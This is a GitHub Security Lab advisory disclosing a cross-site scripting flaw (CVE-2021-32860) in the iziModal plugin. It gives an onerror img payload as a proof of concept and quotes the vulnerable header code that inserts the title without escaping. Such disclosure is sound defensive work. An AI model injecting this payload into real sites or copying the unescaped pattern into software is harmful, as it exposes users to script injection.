skip to content
Back to GitHub.com
Home Bounties Research Advisories Get Involved Events
June 17, 2022

GHSL-2021-1044: Cross-Site Scripting (XSS) in iziModal - CVE-2021-32860

GitHub Security Lab

Coordinated Disclosure Timeline

Summary

iziModal is prone to XSS when handling untrusted modal titles.

Product

iziModal

Tested Version

v1.5.1

Details

An attacker who is able to influence the field title when creating a iziModal instance is able to supply arbitrary html or javascript code that will be rendered in the context of a user, potentially leading to XSS.

Proof of concept snippet:

$("#modal").iziModal({
    title: '<img src="foobar" onerror="alert(6)" />',
    subtitle: 'Blabity'
});

$(document).on('click', '.trigger', function (event) {
    event.preventDefault();
    $('#modal').iziModal('open');
});

Vulnerable code: iziModal.js

createHeader: function(){
    this.$header = $('<div class="'+PLUGIN_NAME+'-header"><h2 class="'+PLUGIN_NAME+'-header-title">' +
        this.options.title + 
        '</h2><p class="'+PLUGIN_NAME+'-header-subtitle">' + this.options.subtitle + 
        '</p><div class="'+PLUGIN_NAME+'-header-buttons"></div></div>');

Impact

This issue may lead to XSS

Resources

Credit

This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1044 in any communication regarding this issue.